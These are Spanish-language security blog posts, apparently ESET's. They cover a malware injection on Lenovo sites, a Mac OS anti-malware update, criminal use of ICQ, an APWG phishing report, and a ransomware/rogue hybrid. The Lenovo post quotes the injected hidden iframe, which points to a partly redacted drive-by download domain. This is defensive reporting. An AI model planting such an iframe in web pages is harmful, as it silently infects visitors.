El fin de semana fue descubierto que cinco páginas web del popular fabricante de computadoras Lenovo fueron infectadas y estaban propagando un troyano del tipo downloader. A través del foro de la empresa, se informó el alerta del incidente, que indicaba la presencia de un script malicioso en los sitios web indicados.

El ataque fue realizado sobre los servidores (aparentemente Linux) de la empresa inyectando el siguiente iframe, que direcciona al visitante a un segundo dominio que intenta descargar un malware a través de una técnica de Drive-by-Download:

<iframe src=”http://volgo-[ELIMINADO].cn/pek/index.php” width=1 height=1 style=”visibility: hidden;”></iframe>

El archivo que se intenta descargar en el sitio destino es detectado por ESET NOD 32 Antivirus como JS/Exploit.Pdfka.OAI, por lo que nuestros usuarios pueden estar tranquilos respecto a la seguridad de sus sistemas. Aunque Lenovo ha informado que el incidente ya ha sido solucionado, se recomienda a aquellos que hayan visitado el sitio durante el fin de semana que exploren sus sistemas en búsqueda de malware. Pueden utilizar de forma gratuita ESET Online Scanner para verificar si su sistema está limpio de archivos maliciosos.

Este tipo de técnicas son de mucha utilidad para los atacantes ya que, al lograr vulnerar sitios populares, logran posicionar el código malicioso en sitios que poseen muchas visitas y que son entendidos como confiables por los cibernautas. Por este tipo de técnicas es que siempre hay que tener instalada una solución de seguridad antivirus con capacidades proactivas de detección y mantener actualizado el navegador con todos los parches de seguridad. No todos los ataques hacen uso de la Ingeniería Social y este es uno de los casos que sin mediación del usuario ni engaño alguno el sistema puede infectarse. ¡A cuidarse!

Sebastián Bortnik
Analista de Seguridad

Categories: Alertas
2 Comments »

Hace unos meses comentábamos en este mismo espacio que Snow Leopard incorporó filtro contra malware en Mac OS, que se trata esencialmente de algunas funcionalidades básicas para detectar algunos códigos maliciosos que funcionan en el sistema operativo de Apple. El crecimiento de códigos maliciosos para Mac OS ha impactado en las políticas de los desarrolladores y responsables de la seguridad del sistema operativo que cambiaron con el lanzamiento de esta última versión la política de no relación alguna con el malware para esta plataforma, hasta hace unos años una problemática ajena y actualmente en amplio crecimiento.

El día viérnes leíamos en AppleInsider que en la última actualización que brindó Apple, Mac OS X 10.6.4, ha sido actualizado dicho filtro para incorporar protección contra un nuevo troyano que se propaga “disfrazado” como una aplicación llamada iPhoto, cuando en realidad es un código malicioso que permite enviar spam desde los sistemas infectados. De esta forma, la empresa demuestra una vez más su preocupación por el crecimiento de malware para este sistema operativo.

Recuerden a los usuarios de Mac OS X que está disponible nuestra versión beta ESET NOD32 Antivirus para Mac OS, que les ofrecerá protección contra códigos maliciosos en dicha plataforma.

Sebastián Bortnik
Analista de Seguridad

Categories: Educación, Malware
1 Comment »

Esta semana leía la noticia de que en Estados Unidos frenarían la venta de ICQ por ser una aplicación utilizada por delincuentes informáticos. Según la fuente de la noticia, las autoridades estadounidenses prohibirían la comercialización del producto en su país, producto de la migración de los servidores del mismo desde Israel hacia Rusia, perdiendo así lo posibilidad de monitorear en busca de actividades delictivas. Como bien indica la noticia, hoy en día “cualquier chico malo está en ICQ“, algo que ya hemos mencionado desde el Laboratorio de ESET Latinoamérica, especialmente en nuestro paper Costos del negocio delictivo encabezado por el crimeware, donde desarrollamos un análisis del negocio que vincula a los creadores de malware con los ciber-delincuentes.

Como indica el artículo, en la siguiente imagen puede observarse el ciclo de comercialización del crimeware, desde el desarrollo del malware, su publicidad a través de foros, hasta la venta del mismo. Justamente se destaca en la imagen que el canal predilecto para el contacto es el ICQ:

Aunque, como mencionábamos, claramente el ICQ se ha convertido en el medio utilizado por las redes organizadas de negocios, en mi opinión no parece muy probable la idea de que este bloqueo disminuya la actividad criminal, ya que el alcance es limitado (sólo a un país) y además existen tecnologías al alcance de los criminales para de todas formas seguir utilizando la aplicación de mensajería instantánea. Incluso suponiendo un bloqueo total, este tipo de medidas nunca dejan de ser temporales ya que los atacantes podrían comenzar a utilizar otro servicio para el contacto entre ellos.

Sebastián Bortnik
Analista de Seguridad

Categories: Malware
6 Comments »

El Anti Phishing Working Group (APWG) publicó hace unas semanas su reporte semestral sobre el escenario del phishing a nivel mundial. En esta oportunidad, se analiza el estado de situación en el segundo semestre de 2009 (entre los meses de julio y diciembre). Bajo el título “Global Phishing Survey: Trends and Domain Name Use 2H2009“, el reporte analiza la evolución de esta amenaza en todo el mundo y también en la región latinoamericana, con casos como los que hemos reportado en Colombia o República Dominicana, reportados en este mismo blog en las últimas semanas. Como bien indica el informe, el phishing es una amenaza atractiva para los atacantes ya que posee facilidades para realizar el ataque y fundamentalmente bajos costos.

En primer lugar, el informe centra su atención en Avalanche, un grupo de asociados de negocio dedicados a la realización de ataques de phishing que, según el análisis, han sido los responsables de dos tercios del phishing en el segundo semestre del 2009. Esto representa un aumento increíble para este grupo identificado a finales del 2008, ya que el mismo informe de APWG del primer semestre de 2009 había detectado que el 24% de estos ataques fueron realizados por este grupo. Avalanche ha centrado su atención en el envió de spam con enlaces hacia sitios de phishing, especialmente orientados a entidades financieras.

Se estima que más de 40 instituciones financieras prestigiosas fueron víctimas de los ataques de phishing de Avalanche. Además, se identificó un promedio de 40 ataques en cada dominio registrado por el grupo. Además, el informe identifica a este grupo de asociados como los responsables de diseminar el troyano Zeus con fines de envío de phishing. Aunque en los últimos dos meses (marzo y abril de 2010) se identificó una baja en la cantidad de ataques por parte de la infraestructura de Avalanche, los responsables del Anti Phishing Working Group dudan si esto es una buena noticia (que indique un cese de actividad) o tan sólo un descanso en preparación para mayor cantidad de ataques a futuro.

El informe arroja también algunos números básicos sobre los datos recolectados:

• En el semestre se identificaron 126,697 ataques de phishing, más que el doble de lo detectado en el periodo anterior.
• Los ataques fueron identificados en 28,775 nombre de dominio, en poco más de 2 mil direcciones IP únicas.
• El 76% de los ataques ocurrieron en Top Level Domains: .COM, .EU, .NET y .UK.

No todos son problemas, según el reporte. El tiempo de vida de los sitios de phishing (la duración que logran mantener los sitios online hasta que son dados de baja) ha disminuido respecto al período anterior, llegando a un promedio de 11 horas y 44 minutos (dos horas menos).

Tanto por las buenas como por las malas, los ataques de phishing son claramente un vector de ataque del que todos los usuarios deben estar atentos, ya que intenta robar información sensible que puede ser utilizada en segundo término para el robo de dinero del usuario, o la invasión de sus datos sensibles o privacidad.

Sebastián Bortnik
Analista de Seguridad

Categories: Estadísticas, Informes, Phishing
2 Comments »

Sabemos que por definición, el ransomware es un tipo de malware muy diferente a un rogue. El primero atenta contra la disponibilidad de un recurso bloqueándolo para evitar ser accedido, solicitando una clave para poder disponer nuevamente del recurso comprometido. Mientras que el segundo, emite ventanas de alertas mostrando de forma exagerada supuestos problemas en el sistema operativo que en realidad no existen.

Sin embargo, que sean diferentes no dignifica que no sean “compatibles.” Y el presente caso nuevamente lo demuestra.

Este malware es detectado por ESET NOD32 como una variante de Win32/LockScreen.EG y al momento de comprometer el sistema se encarga de bloquear el acceso al mismo a través de una ventana que ocupa la totalidad del escritorio de trabajo, mostrando un mensaje que intenta obligar al usuario víctima a comprar un rogue (en este caso Security Tool) para recibir la clave que permite recuperar el control del sistema operativo.

En este sentido, una de las funciones primarias del Laboratorio de Análisis e Investigación de ESET Latinoamérica es precisamente estudiar el malware. Durante ese metódico proceso pudimos establecer cuál es la clave necesaria para desbloquear la restricción de acceso al sistema (HerZamanUstte) y el sitio web al que se conecta para mostrar el formulario de compra:

Luego de una situación similar, la primera y más importante inquietud que recae en el usuario es ¿cómo recupero mi sistema operativo? Y si nos guiamos por la amenaza, la respuesta es básicamente: “comprando otro malware”.

Traslademos esta situación a un ambiente más crítico, como el de una empresa, e imaginemos una infección relativamente masiva con este tipo de malware dentro de una red LAN, simplemente por conectar el mismo dispositivo USB en varias computadoras. En este escenario podemos aplicar la misma pregunta aunque la respuesta seguramente sería muy distinta: “comprando otro antivirus”, pero sin lugar a dudas no el ofrecido por el ransomware.

Este tipo de casos deja en completa evidencia la necesidad de contar con soluciones de seguridad antivirus como ESET NOD32, que detecta este tipo de códigos maliciosos de forma proactiva a través de su tecnología ThreatSense.

Jorge Mieres
Analista de Seguridad

Categories: Alertas, Análisis de malware, Malware
No Comments »